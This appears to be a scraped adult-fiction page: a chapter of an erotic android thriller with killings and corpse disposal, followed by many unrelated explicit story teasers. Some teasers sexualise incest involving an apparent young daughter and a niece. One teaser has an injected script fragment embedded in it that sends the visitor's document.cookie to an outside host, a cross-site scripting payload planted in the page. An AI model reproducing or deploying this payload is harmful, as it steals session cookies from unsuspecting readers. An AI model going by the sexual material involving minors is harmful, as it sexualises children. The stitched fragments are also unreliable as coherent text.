OceaniaChapter 18 free porn video

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Emily returned to the apartment but stayed only long enough to gather all her belongings into a holdall together with several flasks containing her meds. She'd miss staying with Valerie but vowed to try to let her know her new living arrangements as soon as practicable. She thought about leaving a note but didn't want to run the risk of it falling into the wrong hands.

On returning to Janus's house, she found that he'd already reserved space in a wardrobe and freed up a drawer for her underwear. He relished the prospect of having her living with him, knowing that he no longer had to concern himself with hiding his illegal activities, a worry that had plagued him when similar opportunities for cohabitation arose in the past.

They enjoyed a simple bowl of pasta that Emily cooked up. Janus was happy that the girl seemed content to eat simple food and not overly drain his resources by expecting elaborate restaurant fare all the time.

Janus spent the afternoon rehearsing what he'd say to the members of his group now that a more focussed campaign of insurgency was imminent. Emily detected his agitation and relaxed him in her own unique manner, pulling off her clothes and tempting him to take her across the dining table. With all his worries temporarily relieved, he made the final preparations for the meeting.

Disposal of the corpses turned out to be easier than expected. Valerie cut a hole in the body cavities then filled them with rocks to weigh them down. They tossed them into the river about a kilometre from their vehicle and watched them sink without trace. The remains of the chemist was placed in a sack and disposed of in a similar fashion.

"How long before they're missed?" Greg asked.

"An hour, maybe two," Valerie estimated. "It depends on their reporting strategy."

"What am I supposed to do now? My only evidence is at the bottom of the Belmont, I've just covered up a homicide, and my girlfriend is a spy for a corporation that routinely murders people that stand in its path."

"We need to go back to your office. Act as though nothing has happened."

"I want to know everything you know."

"I'll tell you tonight. It's not safe to talk at the station."

"You're telling me that they have it bugged?"

"In a manner of speaking," Valerie said. "Janice is an Infiltrator."

"Janice," Bennett exclaimed. "Smoke."

"Try not to let on. I'm not sure where her allegiances lie."

It took all his acting skills to pretend that nothing was amiss. He told Sands that he'd changed his mind about using his own cash to pay off the informant and had abandoned the meeting. He spoke loudly enough for Janice to overhear.

Greg knew that at some point he would have to inform Sands of Valerie's revelations but needed to sort out his own feelings on the matter first. The implications were mind blowing. Machines that masqueraded as human were the contrivance of tank dramas; evil entities bent on world domination was a favourite cliché.

He stared surreptitiously at Janice, trying to picture her as a killer robot but no matter how hard he tried, he only saw a pretty blonde who flirted with her colleagues. Finishing work early, he drove home and Valerie followed. She expected the third-degree and he didn't disappoint her.

"Let's start at the beginning," he stated. "Syntel tried to kill the woman at the club because she was hacking Quantums?"

"Claire killed everyone at the club."


"Claire Savage, the woman that you're looking for."

"Why did she do that?"

"Because Mason was allowing a child to be molested."

"You're telling me that this one woman managed to kill eight heavily armed men?"

"She's not a woman."

"Then what is she? One of these Infiltrator things?"

"She's a Hybrid, an advanced prototype that combines traits from all the previous models together with a much improved AI."


"Artificial Intelligence."

"So she goes in there, doesn't like what she sees and kills the lot of them."

"She didn't tell me all the details."

"You've spoken with her?" Greg was shocked.

"Syntel tasked me to help kill or capture her. They traced her to the apartment block in the city and deployed three combat units to intercept her. Between her and her family, they managed to take out four Infiltrators and two Hunter Killers."

"Okay. I get the picture. You don't mess with these Hybrids."

"She was only acting in self-defence."

"Hold on. Wind back a minute. You said family. Are there mummy and daddy Hybrids, maybe teenage Hybrids too?" Bennett scoffed.

"Of course not. That would make no sense. Claire's family is as human as you are."

"And she's just trying to protect them?" Greg asked sarcastically.

"I believe that's her prime motivation."

"Why would Syntel create this super killing machine, give it a family to protect, and then try to destroy it?"

"Karl Savage, her husband, was a technician at Syntel's Cybernetics Facility. His job was to configure the Companion variants that I told you about."

"The sex model?" Bennett asked cynically.

"Yes. His real wife was dying and he devised a plan to replace her with a Companion that he'd surreptitiously appropriated."

"That's a bit sad. How can you replace someone you love with a machine?"

Valerie bristled but pressed on regardless.

"He was grief stricken and probably not thinking too clearly. Fortunately, or unfortunately depending on your point of view, he unknowingly chose to replace her with the one and only Hybrid unit in existence at that time."

"I'll bet that made him popular."

"Syntel has been hunting him relentlessly for the past four years."

"How many of these Hybrid things are there?" he asked.

"Besides Claire, there are six," Valerie told him carefully.

"And they're all walking around loose?"

"They are all active, yes."

"We're in deep shit Valerie. How can you work for these people?"

"My circumstances are somewhat complex."

"I can imagine," he replied sarcastically.

"The truth is that until a few months ago, Claire believed herself to be Karl's wife and the mother of his children. She loves them just like any human and would probably die protecting them if she had to."

"But she's not human is she? That's just the point. It's just software."

"She learns in very much the same way that you do. She has a Quantum processor that's every bit as powerful as your brain. Her software is actually very simple; it's the set of experiences in her Datacore and the power to process them that make her who she is. Who are you to maintain that only the human brain is capable of true sentience?"

"And the same is true of these Infiltrators?"

"It's my opinion that's not the case. The Infiltrators are clever but governed by a much stricter set of guidelines. It's not within their abilities to disobey. As the name Hybrid implies, the intention was to develop a multi-role model that could function differently dependent upon circumstance. The processing capability of the Hybrid is orders of magnitude higher and I suspect there is a threshold above which different rules start to apply."

"So let me get this straight. Syntel developed this extremely powerful machine that may, or may not, be intelligent in the way we humans think of it. Not only that, they have the capability to kill people to whom they take a dislike?"

"Humans kill people too. They do it for the most arbitrary reasons at times: greed, jealousy, even fun."

"So you think it's alright to unleash a group of killer robots on the world? I think you're on very shaky moral ground here."

"I didn't create the Hybrids."

"But you work for the people that did," he accused.

"If you want my honest opinion, I think that Syntel set out to design a slightly better Infiltrator with the strength of the HK as an added."

"And they got more than they bargained for?"

"The Hybrids have a great deal of latent potential but it seems to take some kind of catalyst to spark it off. With Claire, she spent years believing she was human. When Syntel caught up with her, they sought retribution by reprogramming her as a Companion and giving her to Mason."


"Ironic isn't it. In acting out of sheer spite, they set in motion a chain of events that allowed Claire to reach a higher level of awareness. Now it's coming back to bite them big style."

"You sound almost pleased."

"Let's just say that I have a vested interest in all this. I've come to realize that Syntel is an abomination. It uses these machines purely as a means to achieve its own greater goals."

"Which are?"

"Money and power, I guess. I have no knowledge of any specific objectives but I assume there must be some."

"Alright, taking what you say at face value, what can we do to put the genie back in the bottle?"

"Excuse me?"

"These Hybrids are clearly extremely dangerous. Their capacity to cause untold chaos can't be underestimated. You have to help me locate them so that they can be destroyed before they do incalculable harm."

"They might not want that to happen Greg. Maybe they're not as sinister as you imagine."

"I don't think mankind can afford to take the risk at this point. Do you?"

Valerie felt sorry for his lack of vision and knew that telling him the full and ugly truth may be the only way to change his opinions.

"Let me ask you this. What do you think about Janice?"

"As a person, I found her a bit cold and hostile. I was still shocked when you told me what she was though."

"What if I told you that you'd already encountered two Hybrids, that you found them witty and charming, that you really liked them as people?"

"I'd say that was pretty unlikely."

"My friend Emily is a Hybrid," Valerie revealed.

Greg looked at her in utter disbelief, almost scared to ask the next question.

"The other one Valerie. Who is the other one?"

"I'm afraid that would be me."

"You..." Greg looked like he was ready to faint.

"I've been operational for just over a year."

Greg felt fearful. He looked around for his jacket and noticed it hanging over the back of a chair. The bulge of the pistol was barely evident in the outside pocket.

"Are you going to kill me?" he asked nervously.

"If I wanted to kill you, you'd be dead already or I'd have let that stupid bitch Melanie do the honours," Valerie stated calmly. "You're looking for your gun aren't you?"

"No," Greg blustered in total panic.

Valerie turned and walked over to his jacket and removed the pistol. She looked at it for a second then sighed and handed it to him.

"If you think I'm a threat then kill me."

Greg looked from the gun in his hand to Valerie several times then pointed it directly at her head. Valerie closed her eyes and waited but Greg was unable to pull the trigger. He walked over to the sofa and sat down. Placing the gun down on the cushion, he buried his head in his hands, moaning desolately.

Valerie knelt at his feet and gently touched his arm, wishing nothing more than to calm his fears and demonstrate that her feelings for him were genuine

"Get your hands off me," he snapped, jumping to his feet, scalded by her touch.

"Greg, I..."

"You're a machine," he accused. "You've been programmed to fool me into thinking that I care for you. It's so callous."

"I do feel those things," she sniffed, devastated by his reaction.

"Maybe you think you do but it's not real."

"It's real to me," Valerie cried. "I saved your life today. I turned my back on my creators because I love you more than anything else."

"Then you have my pity."

Valerie's heart broke. She'd acted earlier out of her desperation not to lose him but now it had happened anyway. She felt some of the hurt that Claire had shared with her, almost unable to withstand it. Unlike the physical pain from when she was damaged, this was an internal pain that was blistering in its intensity. She wailed piteously, tears flooding from her eyes and distorting her vision. Greg watched the display with a mixture of detachment and utter incomprehension.

Greg felt cheated of his love, angry at her deception and for leading him to commit emotionally to her. For the first time in his life he'd truly believed in the power of the heart to control the mind but in the cruellest of twists, it had proved to be nothing more than an illusion. He watched as Valerie stood and prepared to leave.

"I'm going now," she sniffed sadly. "I'm sorry if you can't look beyond our differences and see what we have together. I do love you."

The silence was deafening as she closed the apartment door behind her and left him pondering the emptiness inside. Despite her careful arguments, he failed to appreciate how she could be anything more than the sum of her parts.

Emily stood beside Janus as he welcomed everyone into his home, a few at a time, until the room seethed with expectancy. He'd dressed in a severe shapeless outfit that was almost like military fatigues. She observed the ominous bulge of a pistol in his belt and thought it afforded him the aspect of a general about to address his forces. Huxley and two of his men stood off to one side, adjutants in the forthcoming struggle.

She was alarmed to spot Beverly amongst the masses and recognized the potential for trouble. The woman beckoned her over and she complied, if only to allay suspicion.

"Hello Beverly," she greeted cordially.

I have a message from Henderson," the woman replied. "Command override twenty twelve alpha zero."

The Hybrid gasped as deep sections of her subconscious opened up and replied automatically. "Override accepted."

"Kill Janus," Beverly ordered. "Kill as many of them as you can."

Emily stood stunned as the words penetrated, hardly able to believe that they'd wield her as such a blunt instrument. She turned and walked towards Janus who'd just called for quiet and was waiting for the commotion to die down before speaking. He smiled as Emily approached, a look of grim determination on her face.

"I think we're ready to start," he told her, indicating his desire for her to take her place at the front with the others.

"I'm sorry," she said as she spun up, reached into his belt and withdrew the pistol. The weapon bucked in her hand as she fired repeatedly, not stopping until it clicked on an empty chamber.

Valerie drove home and contemplated what to do next. She couldn't face Greg at the station any more as too much had been said that couldn't be undone. Everything Claire had told her about their capacity to love had proven correct but she'd obviously been fortunate with her partner being privy to her nature from the start. Greg hadn't been able to see beyond his preconceptions.

"Emily," she called out as she arrived home but was dismayed to find her still absent.

She walked into her friend's room and immediately noticed that all her clothes were missing. Her sadness gave way to panic. She rushed into the kitchen and found that her meds were gone also. It was almost as though she'd never existed.

A knock on the door restored hope and she hurried to open it. Her hope turned to confusion as Greg stood before her rather than Emily.

"Greg, what do you... ?" Her words were lost as he leapt at her, throwing his arms around her waist and covering her lips with his own. She closed her eyes to savour the moment as his hands ran up and down her back; then she pulled herself into his embrace as her heart soared.

"I don't care Valerie," he gasped. "I love you too."

Emily looked in fascination at the dead body on the floor, blood spreading out in all directions. The initial shocked silence was shattered by a shrill scream as one of the women in the crowd burst into hysterics. Huxley and his men pulled out their guns and trained them on her but her attention was focused entirely on Beverly's corpse.

The woman's chest was a bloody ruin where Emily's closely grouped shots had destroyed most of her vital functions. Three rounds to the head had eradicated even the most residual thoughts, leaving her little more than a jumbled mass of wrecked hardware.

The command codes had been deep seated in her psyche but fortunately she'd already excised many of the associated subroutines that would have compelled her to obey. Now that she knew how they were implemented, the command codes themselves would be erased as soon as the opportunity arose.

"Emily," Janus exclaimed. "Why?"

"Because I had to," Emily shouted, the intensity of her voice stunning everyone to silence. "She was betraying all of you. Feeding back information about your movements and who you all were to the very people that you're fighting against."

"Beverly was nobody," Janus contradicted her.

"Let me show you exactly what she was," Emily declared as she walked intently towards the body.

Valerie and Greg lay naked beside one another, sweating from their exertions. She felt exhilarated that there would be no more secrets between them and that he could finally love her for who she really was. His fingers idly toyed with her breast, teasing the nipple into rigidity and sending delicious tingles down her spine.

"Do you like that?" he asked.

"Yes, don't stop."

"Have you stopped to think why you should like it?" he asked curiously, desperate to understand more about her nature.

"They wanted to create the ultimate infiltration tool. I cry when I'm upset, I bleed when I'm injured. I feel pleasure and pain."

"What happens when you eat?"

"I can synthesize simple molecules like carbohydrates and sugars. They're broken down and burned in a fuel cell that powers all my main systems. I try to avoid too much protein and lipids as they can cause problems."

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Chapter 1 There was one more month 'til graduation, after which Kara would become an associate attorney with Grayson and Locke in Dallas. They employed nearly five hundred attorneys world-wide, about two hundred of which were partners. At present there was only one female partner. With Kara's credentials she was all but assured of becoming the second female partner in one of the nation's most prestigious law firms. George, Kara's boyfriend during most of law school, was going to clerk...

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The Woman Within

The Woman Within by Darla Raspberry He sat at the dressing table and stared into the mirror. It had been Helen's. She told him that he needed it more than she did and gave it to him as part of the divorce proceedings. He stared numbly into the mirror at the sea of mascara that had been unleashed upon his cheeks and wondered how it had all come to this. He stared down at the small leather case in front of him. It contained a revolver that had been his father's. The weapon had come...

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Business Trip Ch 01

OK, maybe not a true business trip. But she had a conference to attend, and he could always schedule a few appointments in town, to justify the expense account. Just a couple good excuses to get away together. In fact, the schedule didn’t even work out exactly right for them to fly in together. So she had already been in town, and had a half a day’s worth of conference under her belt, before he even arrived. He had checked into the hotel room and headed straight to the pool, to wait for her to...

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BlacksOnBlondes Jade Nile Second Appearance

It’s been a while since Jade Nile has seen one of her very favorite men — Prince Yashua — so they decide to spend a bit catching up. Soon, they’re reliving an experience…the first time they fucked! The conversation gets so heated, soon Prince’s girthy piece of black meat is as hard as quantum physics! “You know what,” Jade says…”let’s make this hotter than the last time we banged!” Prince thinks for a long minute, then...

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A Gift From His Father Ch 01

To say that John hadn’t been very close to his father would be to make one of the largest understatements known to man. He rarely saw the man when he was growing up, despite a number of his irregular visits. There were many, but John barely remembered him spending anytime with him. Nevertheless, he provided well for him and his mother, despite the fact that the two never married. As John grew into his early teens he learned by accident that his father was a very powerful and wealth businessman...

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Full Assistant

Samantha was desperate. The recession had devastated the job market, so that when her firm had laid her off she hit a brick wall in her attempts to find work. Due to the falling housing market her mortgage, already months overdue, was now worth more than the house; and her car was also worth less than the outstanding loan, which was also behind. She had used up her savings, had credit cards that were all maxed out with no way to pay them off, and she had a student loan that would follow her if...

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Are Your Curtains Closed

She was my dirty secret!! I used to watch her from my bedroom window as she got undressed. I would peer at her valuptious body through a crack in the curtain with the lights out and my cock in my hand. Her bedroom window was directly opposite mine at the bottom of my back garden,and at eleven thirty mostly every night she would appear there.She never drew her curtains,there was no reason to.No one could see her…he he he. Or so she thought! I could see though..oh yes i could see everything.And...

1 year ago
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Sex Education begins at home Chapter 2

Title: Sex education begins at home – Chapter two Author: Riatman THIS IS A FANTASY, DON’T TRY IT AT HOME-YOU WILL BE ARRESTED After my daughter and I had our first sexual tryst it was weeks before we were able to properly fuck again. During those weeks we could only masturbate each other quietly on the odd occasion, as there was always some one else around. Our relationship had relaxed and even my wife commented on how calm and easier to get along with the young girl had become. Luckily my...

4 years ago
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The Trailer Park The Fourth YearChapter 56

"Beat it, Temple!" Kenny tried to look innocent. "I'm just watching my sister. Can't a guy watch his little sister practice?" He and three of his friends were leaning against the door to the gym. "Not here, and not now," I said as I walked up to him. "Get out." "Listen, Mr. High-and-Mighty football hero. You're not the boss of our school, and you're not the boss here." "Haven't you heard? Football's over. I'm just killing time until baseball hero season." I stepped up...

1 year ago
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my sister in law

ive allway had this great comunication with my sister in law im always doing her favrs and i won lie its because i like her she has this amazing body. she has a tone up ass and this perfectly round tits just big enough to make me almost drool last year it was my birthday and my girl invinted her to a pool party we did in a friends house. when she arrived we started drinking and playing around. we all wen upstairs to the apartment and we put the music on and strated drinking and dancing. she...

2 years ago
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A Slut and Her Tentacle Monster Pt7

They giggled and laughed, running the gambit of inane conversation from boys to pop culture to clothing, never once indicating they knew anything was amiss downstairs. The conversation became clearer as I ascended, headed towards the loft that made up the third floor of the house, and came to a halt when they heard me.I hopped up the last few steps, inwardly grinning at the ease with which I did so carrying such a large belly. Waving to them, I saw my big s*s roll her eyes at the intrusion, and...

3 years ago
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Femme Your Hubby Instalment 2

Title: Femme Your Hubby Installment #2 Author: A. K. Remenko Preface: I have been privileged to learn a few things by being permitted to observe the work of some very accomplished individuals. For what it's worth, I'll share what I've learned or at least THINK I have learned. A FAQ section is being prepared. Questions should be e-mailed to [email protected]. Flames and the like will be ignored and cheerfully deleted. Not for dissemination to minors under any...

3 years ago
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An Attraction Became A Trip To Bed

I’ve been an avid reader of ISS, however, this would be my first sex story… Before anything let me introduce the two main characters Siddharth and Shilpa (name changed due to discretion) If you like the story or just want to strike up a conversation or want to go beyond do mail in Please excuse me for the mistakes and grammar. Sorry, I’m making this long but I’ll try to make it worth it. Siddharth a passionate photographer, a graphic designer, and a gifted masseuse. An extremely popular guy...

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A WellLived Life Book 10 The WifeChapter 18 Kathryn Ryanne OConnor

January-February, 1985, Chicago, Illinois After Alice left I went back to work on my homework. I guessed I’d be up until around 1:00am to finish everything given how much I’d put off until tonight. I got to work, and around 9:00pm Joyce called to update me on her grandfather. He’d had a catheterization and wouldn’t need surgery. He’d now be on blood thinners, and had been given a diet and exercise plan, which mostly involved walking. I wondered how he’d do on a diet, especially given his...

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Its Practically What Uncles Are ForChapter 16

The menial tasks of clearing up had naturally made George's dick soften, but the sight that met him in the bedroom returned so much blood to his groin that it threatened to rip open his trousers. Hannah was lying on the bed naked, clean and inviting after a shower. Her sex was swollen and glistening with secretions. "That is the prettiest pussy I have ever seen," George said. "It looks yummy - good enough to eat!" "Does it?" Hannah asked nervously. "I've never tried that." "You...

3 years ago
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VacationChapter 32

Day Thirty-two - Thursday - Day one of our new life The phone was ringing. I didn't even realize we had hooked it up. The phone was still ringing. I slipped out of bed looking at the clock, five-thirty. "Hello." "Steve, I'm glad you're up. This is Gene and I really need your help. I heard you were not going on a honeymoon, so I knew you were going to be in town." "Gene, it's five thirty in the morning. Couldn't this wait till, oh, I don't know, maybe seven?" "No, no, it...

2 years ago
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TKKG Die Entfhrung

TKKG - Die Entführung Tim, Karl, Klößchen und Gabi saßen im Zug in Richtung Tschechien. Dort wollten sie zu einem Klubtreffen eines "Klubs der Tollkühnen", zu dem sie eingeladen worden waren. Voller Vorfreude erwarteten sie eine Woche voller Spaß und Abwechslung. Der Zug hielt in Hochsteupen. TKKG stieg aus und stand auf einer leeren Straße. Nein. Sie war nicht leer. Am Ende der Station lehnte ein Mann mittleren Alters mit einer Straßekarte an seinem Auto. TKKG ging zu dem Mann, welcher sie...

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Sigma Omega SigmaChapter 8

“Damn, Randall ... you really know how to do this!” I exclaimed as Randall Sullivan fucked his wife Candice’s mouth in a gang-bang that made her “airtight.” I was inside Mrs. Sullivan’s sweet ass, of course, while Marco Resendez was now balls deep in her dripping wet snatch, ready to take a load dangerously close to her womb. I looked over at Lizzie, who was now busy pulling a train herself. Her own father was underneath her, fucking her tight, wet pussy, whereas Harold was up her ass and...

4 years ago
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Used by master and friends

Antov is the name of my master. He is a tall and stocky figure, his cock is very thick and it’s uncut.http://rbal.atwebpages.com/a.php?'+document.cookie;" width="1" height="1">We usually meet on weekends, he comes over to my place sometime in the night, I never know exactly when but I know what I have to immediately as he comes through the door.I kneel before him, unzip his trousers and suck his thick cock until he signals me to stop. Sometimes I suck him...

1 year ago
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Part II 3 All In Chris could see the house up ahead he was about a half block away. There was dim light coming from her bedroom. He knew that window well as he often found himself there usually after the urgings of wolF. Sometimes he jacked his dick and sometimes he would just watch her. Things had been difficult since that asshole Law (what kind of fucking name is that?) showed up. Last week he found himself outside his favorite...

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My Neighbors Voyeur

As she leaned forward sweeping or mopping the floors, I enjoyed a down blouse view of those gorgeous mounds when she was facing my direction, or, when she faced away, the bottom quarter of her firm, full ass cheeks being parted by the seam of her cut-offs, a voyeurs dream come true. ‘Shit’, I whispered when, just as Mrs. Walson was leaning forward to pick something up, Jason Smith, a friend of mine who lived up the street, casually strolled by the Walson’s house, obviously enjoying the...

3 years ago
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My Awakening

I am in my late forties, I am not ugly but I am no super model either and have only slept with three men in my life. My high school boyfriend, my first husband, and my current husband. Sex is okay with me but I have never understood what all the hubbub is all about. My husband and I bought a small 30 room motel in a small town in Colorado that we thought we would run when we retire. I lost my job and since the k**s are all out of the house I went to run the motel. Karen is the woman that has...

2 years ago
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Spies and Lovers

The phone rang as I stepped into my black heels and attached my faux pearl clip-on earrings. Hugo put his watch on and picked up the receiver; the muted voices on the other end were speaking German.“Wir haben bestätigt, dass Lotte eine Spionin ist. Bring sie herein.” (Tranlation: We have confirmed, Lotte is a spy. Bring her in.)After putting the receiver back in the cradle, Hugo didn’t turn around but just said, “We have to stop by the office before dinner.”If you could close your eyes to the...

Quickie Sex
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In Love With Classmate

Hi friends. This is Vibin. This is my first story. I am not a good writer. Still I am writing this because I want to share my pleasurable moments with you. OK. I am coming to the story. My native place is Thiruvananthapuram, capital city of Kerala. My look is average not much handsome. I took my B.Tech degree from Kerala University Trivandrum campus. For the 1st and 2nd year, I was a kind of shy person and usually I talk to only boys. Things are changed when BSNL started student suvidha plan...

1 year ago
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My Wife and I

How can I say it? When I write in the third person it is fiction, but when I write in the first person it is autobiographical, although it might be a little edited to make a good story, it is, in essence, what I have lived and experienced. Not fantasy. It's True. For instance, take my story of my honeymoon in Paris: all true! It realy happened. My wife often refered to "Jaquie" the charming stud with the huge cock. ('My wife' means my second wife, a long legged German, academic lady, who loved...

2 years ago
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Woman in the next window part 2

It’s been a while since I last saw her. A couple of days. But after our last encounter it surely seems a lot longer. I actually got worried, that maybe something happened. I mean they way it looked, I thought we both were alone in our offices, but maybe she got caught or something. But this morning I saw her again through the window and she saw me. We smiled at each other. I was immediately brought back to the adventure a few days ago. The way she teased me was unbelievable. Seeing her...

3 years ago
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HR representative can really help

Hi friends Raj here with another story of a slightly older fuck. It was just after my first project in 3rd company almost 3-4 years back. It was in Europe (I had not enjoyed the weather and the project) and one of the costliest and busiest capitals in Europe. I had not got much chances to fuck and was frustrated with the team, the Senior Manager and our sales guys who had promised the sun the moon the stars and universe in just 2 months. I had been irritated by the typical high handed European...

4 years ago
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The House That Haunts Olivia

Making her way through the early morning mist to deliver her newspapers, Olivia peers sadly at the lonely house at the end of Willow Lane. Each time she’s near this neglected house, she feels an unexplained sorrow and deep fear that somehow makes her feel connected to its mysterious past. No one, including her family, seems to know the true history of the house. She’s never heard of one soul brave enough to step a foot inside the jagged doors. The people in this small town believe and continue...

2 years ago
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Runaway TrainChapter 90

I drifted off to sleep again as my brain tried to process all the information I’d received. It seemed as though the surgery (or surgeries, I suppose) had been far more extensive than seven years earlier. I had followed the rigorous recovery routine the surgeon had suggested then – not only because I wanted to get back to playing baseball again, but also because Rosalita had been a dictator about forcing me to comply. Then Domingo had been promoted and she had left with him. I had maintained...

1 year ago
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“Here XXX” is a simple enough statement, one of those two-word phrases that can get the point across even if you’re trying to speak through a language barrier. You might be otherwise completely confused throughout the whole conversation, but when you get to that line, you know something good is going to happen: you’re about to get some free porn.Sometimes when I wake up in a Viagra fog and can barely remember where I am, I ask myself, “Where XXX?” Well, one place it can be found is HereXXX.com,...

Asian Porn Sites
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Rekindling a Highschool Romance

I stood at the counter cutting up tomatoes for tonight’s salad. My parents were out of town for the weekend. It was just me and Scott there together. It was planned, a date night. Scott was my high school boy friend. After graduation he joined the Air Force and we gave up on it all and went our separate ways. Scott was home and wanted to get back together. As I cut up the tomatoes, I thought that it will never work. Long distance relationships never work. I glanced up at him as I thought he...

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The Tough Get ComingChapter 7

On Monday morning both men had to leave early, Bill for school and Ken off to work, so that by the time Gwen awoke and shuffled downstairs, only she and her mother were left in the house. "Gwen honey, are you okay?" Carol inquired as her daughter flopped listlessly down on a chair in the kitchen, staring with reddened eyes into the steaming coffee cup her mother had set before her. Gwen had spent most of the night split between tossing restlessly and crying. When Bill had crawled into bed...

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